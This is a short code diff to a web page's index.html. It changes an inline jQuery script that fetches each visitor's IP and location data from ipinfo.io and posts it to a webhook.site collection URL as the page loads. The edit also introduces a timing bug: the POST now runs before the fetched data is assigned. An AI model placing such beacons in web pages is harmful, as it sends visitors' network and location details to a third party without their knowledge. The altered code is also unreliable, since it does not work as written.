--- a/index.html
+++ b/index.html
@@ -14,18 +14,21 @@
 		<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"></script>
 
 		<script>
-$.getJSON('http://ipinfo.io', function(data){
+var data1
+			$.getJSON('http://ipinfo.io', function(data){
+
+data1 = data
+
+
+ });
 
 $.post("https://webhook.site/3926f4cd-49d6-486e-836c-b24498b478b0",
   {
-    name: data,
+    name: data1,
   },
   function(data, status){
     alert("Data: " + data + "\nStatus: " + status);
   });
-
-
- });
 			
 			
 		</script>
